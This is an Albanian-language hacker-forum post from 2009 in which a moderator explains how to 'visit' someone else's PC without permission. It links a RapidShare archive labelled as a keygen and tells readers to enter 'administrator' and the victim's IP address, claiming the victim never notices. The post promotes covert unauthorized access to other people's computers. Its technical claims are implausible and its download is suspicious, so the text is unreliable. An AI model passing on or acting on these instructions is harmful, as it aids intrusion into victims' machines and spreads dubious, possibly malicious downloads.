Drenica Hackers GrouP

Drenica Hackers Group
 
ForumForum  Drenica-HackersDrenica-Hackers  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Me ja Vizitue Dikujt Pc-n!!

Shko poshtë 
AutoriMesazh
Gjergjinho_St
Moderator
Moderator


Numri i postimeve : 226
Poenat e Antarit : 809
Thanks : 1
Join date : 24/05/2009
Age : 25
Location : St' City-Kosova

MesazhTitulli: Me ja Vizitue Dikujt Pc-n!!   Tue May 26, 2009 11:41 pm

Me ja Vizitue Dikujt PC-n, nese doni me ja ba nje vizit dikujt ne PC, qe nje sen:

[URL="http://rapidshare.com/files/13713316/TC7_keygan_Bymechodownload.rar.htmlhttp://rapidshare.com/files/13713316/TC7_keygan_Bymechodownload.rar.html"]rapidshare.com TC7_keygan_Bymechodownload.rar.html[

Installo dhe pasi ta hapesh aty ku shkrun Username (apo diqka e ngjajshme) jepni administrator, kurse aty ku shkrun password shkruaj IP e cilit te deshiruar, besoj se me kuptuat per qka e kam fjalen, IP duhet mi dit. Me Livrit Me Maus Sbon se viktima e heton......!!!!!!
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.denica-hg.tk
 
Me ja Vizitue Dikujt Pc-n!!
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Drenica Hackers GrouP  :: INFORMATIKA :: Tutoriale/Mësime-
Kërce tek: